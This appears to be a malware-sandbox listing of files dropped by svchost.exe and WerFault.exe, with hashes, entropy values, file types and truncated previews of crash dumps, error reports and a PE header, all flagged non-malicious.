                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.... .c.................:....B..............P....@..........................._..............................................s..d.....^..x...........................Q..............................hm..@............P..t............................text....9.......:.................. ..`.rdata..b,...P.......>..............@..@.data.....B..........l..............@....rsrc....x....^..z..................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):1.3073470233674633
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrO:KooCEYhgYEL0In
                                                                                                                                                                    MD5:A36724EB10ED17D756039009446D685C
                                                                                                                                                                    SHA1:A25C303632E6B28A9565B80F64091EDC1AEEEE27
                                                                                                                                                                    SHA-256:0A40D71989FA44CBA52448C1808E3D549CA12101743A090BB44860B62D779DF7
                                                                                                                                                                    SHA-512:FF89DAA4E75798913B492EF6CA3E0474DF2A30C48D1FAEDFA01BA6DFB3808C94652DE3D8853181A91EC0F048EFF9A19B92A8390C5500FB0F7031CC68AC0D6FB9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x6e7ea423, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1310720
                                                                                                                                                                    Entropy (8bit):0.4221529397592173
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:pSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:paza/vMUM2Uvz7DO
                                                                                                                                                                    MD5:8D1E77D94EA884FB3D14435A1C678564
                                                                                                                                                                    SHA1:2431BDA6389139A7587CB087C6BCF64066584D26
                                                                                                                                                                    SHA-256:C2B90FC04F6A4C0226F48B7516F251329C0C0AAE003AFE2941849DD9356232C1
                                                                                                                                                                    SHA-512:7D32B705CD7E04FB85C0D33BEB394E33B62646F390FDD41A95B45A2AD68CCED6E3387DCB117A572C84B57301E7592CD73B7A2D71328BC3937C9505D12A02DB88
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:n~.#... .......A.......X\...;...{......................0.!..........{A.:....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................,.=:....|%....................:....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:TeX virtual font data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                    Entropy (8bit):0.07620803047174843
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:NS6YeoDCjjn13a/A4v0iQ7llcVO/lnlZMxZNQl:c6zLj53qAi8hOewk
                                                                                                                                                                    MD5:1A6EB22D0B9F968544A3DD77351D4911
                                                                                                                                                                    SHA1:1F1203F1274C32AF45D13425EBD3457983E83E57
                                                                                                                                                                    SHA-256:17114A2E4D407FF3598DE1A8A9A561A75DCE45A5C57D6E51AACD4B3B45900600
                                                                                                                                                                    SHA-512:49F3CFAB0B404DF4F80515F926A473AF2C522E182D8A9B54DBB8EBEAAC343F1F22306AB551794620C141448778046919A4FDD768D63745747DE699CFDA02BF92
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:........................................;...{..:....|.......{A..............{A......{A..........{A]...................:....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):0.7893501152854914
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:xFFe3B3wVGr7slXy39fn6tQXIDcQvc6QcEVcw3cE//+HbHg/8BRTf3o8Fa9OyRVR:z0BSGr7B0BU/Yj//szuiFHZ24IO89z6
                                                                                                                                                                    MD5:6C562534ECA551A7FCA6CE792AE44066
                                                                                                                                                                    SHA1:8BC8CAAC1F69BEA174FE401D4C96DDDD8DC4CFF6
                                                                                                                                                                    SHA-256:390C80A717CCF9BF015E7BAE622473FB64F1FF43371C223AFAF9F04F8A0A7064
                                                                                                                                                                    SHA-512:1A4E3E063BBCF1DF6A9D87DFEB380AA4D5975BC2A86B12B4547EA9C76976A2AC3220036990110CAF75513C15AE6BD0E10E35D6299B2D9DBA28F9670B2867864B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.9.0.7.5.4.1.1.3.4.1.7.2.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.9.0.7.5.4.1.3.5.9.1.7.3.0.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.4.1.a.8.8.7.-.1.3.5.6.-.4.4.f.9.-.b.c.0.4.-.7.e.d.d.2.8.0.e.f.0.5.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.5.8.9.2.9.b.-.9.3.a.b.-.4.9.8.d.-.9.7.6.d.-.d.b.7.2.7.9.c.9.6.6.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.D.F...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.5.0.-.0.0.0.1.-.0.0.1.4.-.a.d.7.8.-.8.7.2.c.2.2.4.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.4.f.0.8.e.c.1.3.3.2.c.2.c.7.4.a.f.1.1.f.d.f.5.b.0.4.0.e.5.a.3.0.0.0.0.0.9.0.4.!.0.0.0.0.f.2.c.0.5.0.c.e.a.a.8.9.7.8.2.b.f.c.1.a.c.1.1.4.0.8.b.1.d.d.0.d.1.c.5.b.f.8.5.0.!.2.D.F...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                    Entropy (8bit):1.045278952770282
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:1EF32RDGjDHJJOqIKxuVKQXIDcQvc6QcEVcw3cE/n+BHUHZ0ownOgHkEwH3dEFYO:KYF6Dp40BU/KaG6Y3zuiFHZ24IO88
                                                                                                                                                                    MD5:0BA40F7A1BDF3BAEB824C53391A68E0C
                                                                                                                                                                    SHA1:7DCCB6C8FEC0C9A115BD494F2890DA12FFEBCCE0
                                                                                                                                                                    SHA-256:29FF67F212D4A0622A53DF9DF249CD903A21182073E336A839179668D1AA4690
                                                                                                                                                                    SHA-512:7C3218C7AC68E49F15352E73DF840FA4AAAFC6B18DA20AC8B0F2DE05A61FE8EB693F98B90EBACF6ED95D3A66773A2BA7A316EB698164BB4CAF485F3C584F8844
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.9.0.7.5.3.8.8.6.8.2.2.7.6.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.9.0.7.5.3.8.9.7.2.9.1.0.5.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.6.b.b.c.e.2.-.3.8.0.d.-.4.5.1.d.-.9.a.b.7.-.9.d.1.9.3.e.6.5.b.d.3.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.2.1.8.c.4.d.7.-.8.0.c.0.-.4.b.5.0.-.b.a.a.8.-.f.0.8.9.6.2.1.c.8.4.d.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.D.1.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.s.p.e.l.l.i.n.g._.b.y.t.h.e._.r.u.l.e.s._.o.f._.l.a.n.g.u.a.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.0.-.0.0.0.1.-.0.0.1.4.-.d.a.b.c.-.c.e.2.4.2.2.4.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.5.7.7.6.b.a.e.5.f.3.1.9.6.5.9.6.c.0.b.a.6.1.b.4.2.1.5.8.a.1.c.0.0.0.0.0.0.0.0.!.0.0.0.0.a.b.6.1.3.0.9.5.b.2.f.b.6.7.1.7.f.a.
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6851467030251723
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWCIx5iUe3Y6gYcaWbPHhYEZ2TtDiGIW4OwReq2anw+MpnMXIOQe3:2ZDCzsDSKF2anw+MpM4OQe3
                                                                                                                                                                    MD5:1266814C47DBE9CB4B690F3BC787E103
                                                                                                                                                                    SHA1:BF8E2F0A5E24B242EC79F70C8B1031D559AAE92A
                                                                                                                                                                    SHA-256:884CC2B84ADEC22D4098597351F0EA96CAE3A077E88BF9873BCC0520BFD56798
                                                                                                                                                                    SHA-512:DACBF8A4033D1E14ED7E9322AE63126D6FD0B8ECCDCF4BD9B9DC717C614BC176021F3FCBAD1D557617C27224EB69E85F21D2A62E74DEB0D7940AF8ADFEC1CA2A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4635
                                                                                                                                                                    Entropy (8bit):4.424863638369923
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsbJg77aI99AhXWpW8VYbYm8M4J5FF1+q8vghc13FeTd:uIjf1I7MA7V/JHKUc13FGd
                                                                                                                                                                    MD5:5C9B4E00821A76921A05A6F9FE5FD6DC
                                                                                                                                                                    SHA1:3A1E45581DD874678949AB6A2C8322FB3C8D9C2B
                                                                                                                                                                    SHA-256:A684E49A0C8D1966F618898BE7CCC037169E303A0CA97E7AFE9B9C4D7AAF08F7
                                                                                                                                                                    SHA-512:4201C9FCBEECA5570134D624F96049BC954CD8E55FD91C0A1E024B25EDD8D00F5DC0CF7916A7995D8984ED621B991E3030BB3D522BF5862584AEE4DCED22603F
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="137972" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):80020
                                                                                                                                                                    Entropy (8bit):3.0373562686722226
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:fmwDZQrx4jZOWSUkHsvxruDec3+U8+TJ4m1SWyC5EQ:fmwDZQrx4jZOWSUkHsvxruDec378+TJn
                                                                                                                                                                    MD5:D6B854A6290A484E877D9E07468D8BC6
                                                                                                                                                                    SHA1:E1F52FCE7E48939DA42EA79B3B537552E3EBB14A
                                                                                                                                                                    SHA-256:545923C65E4EFFD71D14479B50EF0BE35B78FB699D28AAF0CEFCB5847A3D7734
                                                                                                                                                                    SHA-512:4BC3D62110F4AC2C796DEE435B0B15EB2C281DFB1413464E132A5575B94832FDDA7082B41A54E6CD6162B92D694CCA9AE57B2CA3A6F60E91F7D3F389F83088F9
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Sun Jan 7 04:29:49 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):225053
                                                                                                                                                                    Entropy (8bit):3.5779604741090987
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:29XEWuBojRUpN4uE2aOLLTgT97SVXRiAoCpHN1CDzrtTHO8iKc1NubiaZs8Qus:2yOi4uEqLLTgFyeiidq8Y1Nub7ZJ/
                                                                                                                                                                    MD5:CE8D0D7A336A1ABD968B0BF04FC91F96
                                                                                                                                                                    SHA1:8AD566060988066FD5EBE1A31D229C22EE331988
                                                                                                                                                                    SHA-256:F0CE6E47A771D20ABD9D376B3D42F0D76AA407CC4F3C73C47988B47801152184
                                                                                                                                                                    SHA-512:1C38C5886D28836AA8D301CCD373000E72AD871A85B647966C970CE3007568756548618E81038A8A5514F0A6ACD46E81C383BB89BE46689939581C3B40FD8FC2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... ........(.e............................(.......$................J..........`.......8...........T............-..mA........... ..........."..............................................................................eJ......."......GenuineIntel............T............(.e............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8402
                                                                                                                                                                    Entropy (8bit):3.6930312217628027
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l7wVeJo/6hc6Y9rSUZ1mgmfZ/UIpre89biysfOWm:R6lXJg6hc6YBSUZ1mgmfxUiixfm
                                                                                                                                                                    MD5:163C02C8D5C5C77FCA3E2DA3C059A0EE
                                                                                                                                                                    SHA1:EFE641E5AE5AF3F3D379E080039AF1C0925D9DB2
                                                                                                                                                                    SHA-256:999AFE0BEB5D6069CF38AA15F36303465C5E6014CA79445A97D36D8A488D43EA
                                                                                                                                                                    SHA-512:A0FBF48B782984420438FA9CBED7520F138935176B0DCBBFD965FFF3CFB4A490E6B015B016504FE3132FDE2C8BEA85B807F0ABE015BF3AF1742B3E5F81A7B3ED
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.3.6.<./.P.i.
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4756
                                                                                                                                                                    Entropy (8bit):4.46013152303132
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwWl8zsbJg77aI99AhXWpW8VYCYm8M4JNAUOKF4QsFt+q8v9UOKF4QOIi2Z9d:uIjf1I7MA7VuJN82MKr2e923d
                                                                                                                                                                    MD5:4877AA13ACD02750501FE788BC4DF39F
                                                                                                                                                                    SHA1:2573FD07BB1E19CF70E6D550921761A0209DD21F
                                                                                                                                                                    SHA-256:5B7866527908523C91F2096C06372F6E96C7A9DA3F645DB8FAE1DC7B569AAECF
                                                                                                                                                                    SHA-512:157F9B22EF50B076DD19589977A6DA6BB323A7766905E1426EC9154454962E9BE69E8F7D08296BEF034EFBECF16FCEE967751C96B833A3F90C563519FBB7775A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="137972" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):79650
                                                                                                                                                                    Entropy (8bit):3.0387359520026314
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:iAVIlXZYdLbOezTudSLXueE8kU8+TJ4me2sp410:iAVIlXZYdLbOezTudSLXueE8N8+TJ4m0
                                                                                                                                                                    MD5:AB89B8B3E8BDC2B6EAB1DF7F7F1EF0B9
                                                                                                                                                                    SHA1:3F7908B2EFF4666820ACF0F96DFB86EE884AE17C
                                                                                                                                                                    SHA-256:111D97999AE4FA5FA2EC5FDB0E711C62060A96D122B90A5E3D2171C6B99C6EED
                                                                                                                                                                    SHA-512:6808219D9ABAEBF4646711B7DF10D5E5B0579D21E18D0E992416A698C782B6AE4D8B88A6A487A14BA1836EEA2E9EB0201ECCE2287DC737308651D5A90168C531
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6839870985848946
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWUxOlz0YwYYWUH6YEZMOtDi9ICvSjwwMnaHwFMk5yI4Qe3:2ZDUn3sGaHwFMk5V4Qe3
                                                                                                                                                                    MD5:11F0DCD37DD7F41824A1695D42B7988A
                                                                                                                                                                    SHA1:6AE57C66F67841CBCB368395625B252E50BE3FC4
                                                                                                                                                                    SHA-256:FFB7F4C7DC3DCE5B4A5E7B54975A772C4F39F9752E7E925F67A90BF4593AB8FA
                                                                                                                                                                    SHA-512:91496568CCE8AE35CD0316C9AAFC7ECE6DE96ADB927D3FF82DB4C29B3B1829FE5BA09828C0FFA7BBE0C52F2C9E9C04F4829C6BAFB89ADFE7CC77B5D3255240C7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Sun Jan 7 04:30:12 2024, 0x1205a4 type
